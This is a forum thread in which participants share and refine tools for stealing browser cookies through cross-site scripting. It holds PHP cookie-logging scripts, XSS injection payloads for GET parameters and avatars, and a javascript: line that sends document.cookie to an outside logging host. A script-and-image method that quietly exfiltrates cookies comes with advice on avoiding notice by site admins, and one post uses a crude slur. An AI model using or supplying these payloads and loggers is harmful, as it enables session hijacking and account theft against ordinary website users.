communit cookie logger?
well, here it goes..
putenv("TZ=Europe/Oslo");
$ipLog="logS.html";
$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS \of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
$port = $_SERVER['REMOTE_PORT'];
$cookie = $HTTP_GET_VARS["c"];
fputs($log, "
<p>---------------------------------------------------------------</p>
<b> Host:</b><i> $host </i><br>
<b> Port:</b> $port <br>
<b> Cookies:</b><font size='2'> $cookie </font><br>
<b> User-Agent:</b> $user_agent <br>
<b> Referer:</b> <a href='$referer'><font size='2' color='gray'>$referer</font></a> <br>
<b> IP:</b> <a href='http://$ip'><font size='2' color='gray'>$ip</font></a> -
<a href='http://www.dnsstuff.com/tools/ipall.ch?ip=$ip&src=ShowIP'><font size='2' color='gray'>DNS-Ping</font></a><br>
<b> Date:</b> $date
");
?> ```
Note: the putenv("TZ=Europe/Oslo"); is used to print out my Time zone, and yes, i did strike my IP with *'s :p
http://www.theprojects.org/dev/zone.txt
logS.html should look like this now:
http://i11.tinypic.com/4kde8lc.png
Cookie loggers require an XSS hole in a site. Believe me, i thought all i had to do is get someone to go to a cookie logger and i would get all their cookies. I later learned that thats not how it works. You need to find an XSS hole, get your victim to click it, then you will get that persons cookies from whatever site you found the XSS in. Hope this helps.
bigggnick wrote: Cookie loggers require an XSS hole in a site. Believe me, i thought all i had to do is get someone to go to a cookie logger and i would get all their cookies. I later learned that thats not how it works. You need to find an XSS hole, get your victim to click it, then you will get that persons cookies from whatever site you found the XSS in. Hope this helps.
you can just link to the cookie stealer, then make them click the link, or an Image they can click, but the best way is to find an XSS hole in a GET variable, like, search.php?q="><script>blablalba</script> or even search.php?q="><script src="blabla.js">
then, make a tinyurl to that page(http://vuln.com/search.php?q=">etc..) and make the victim open you'r tinyurl..
but if you find out you can execute JS in your avatar or Profil, that'll be even better..
so you dont really need an XSS hole, just something that wont filter you'r link..+ document.cookie..
I'm the author of the community cookie logger mentioned in the thread. Yes, you need to use it as you do any other cookie logger. You could always grab the source code (available in the /source/ folder) if you want to see how I made the page. The code is uglier than a downs syndrome sufferer that Satan built to while his bitch was refusing sex but I wrote the bugger in 24 hours.
To test it out, create an account and copy paste this into the address bar on this page:
markupjavascript:i=document.createElement('img');i.setAttribute('style','display:none');i.src='http://ccl.whiteacid.org/log.php?XXXXXX'+document.cookie;document.body.appendChild(i);alert(i.src)
replace XXXXXX with your account ID
Then log into your account, you've just stolen your own cookie
This creates a 1x1 png image: unnoticeable (change the BG color) and no need to all the redirection crap. You need the GD library: a few free hosts do support it.
inject:
<script>
document.write("<img src='http://localhost/image.php?data="+document.cookie+"'>");
</script>
php:
<?php
$data = $_GET['data'];
header("Content-type: image/png");
$image = imagecreate(1,1);
imagecolorallocate($image,1,1,1);
imagepng($image);
imagedestroy($image);
$fp = fopen("misc.html","a");
fputs($fp, $data."<br>");
fclose($fp);
?>
on server:
chmod misc.html 777
white acid: if I take your source and integreate this method into an alternate method for the community, would you be willing to put it up?
By default it actually does redirect to a 1x1 transparent .gif (http://ccl.whiteacid.org/transp.gif)
bigggnick wrote: Cookie loggers require an XSS hole in a site. Believe me, i thought all i had to do is get someone to go to a cookie logger and i would get all their cookies. I later learned that thats not how it works. You need to find an XSS hole, get your victim to click it, then you will get that persons cookies from whatever site you found the XSS in. Hope this helps.
heh, it took me a while to get that too. luckily, there's bucketloads of XSS holes still floating around myspace and other popular sites.
=D
WhiteAcid wrote: By default it actually does redirect to a 1x1 transparent .gif (http://ccl.whiteacid.org/transp.gif)
Yeah, but isn't that a redirect? With that method you can actually post it as an image on the site. For example, your avatar.
Not applicable. It actually REDIRECTS you. When you end up on a new page with a new URL, and you're not an idiot, you get the club and patch your site/log out, leaving the attacker perhaps 15 seconds during which to do his work, you'll only get things done if you already have a script made to do them.
Now, if all your XSS attack is is a tiny white dot along with everything else on the page, and the URL stays the same, then it's not a big deal and fewer will notice.
For example, if I included an img write here, like so: :( then you wouldn't be suspicious
BUT, if your browser redirected to JUST a picture of that, you sure as hell better be confused and suspicious.
That's going a bit out of the way, IMHO. And it's still introducing a page reload that's unnecessary, plus forwarding traffic to a page it normally isn't forewarned to (although I guess that could be fixed in some cases) When the admin looks in their browser history after spending half a second longer staring at a blank white page or the page he isn't supposed to, or just a wrong url, he's going to notice.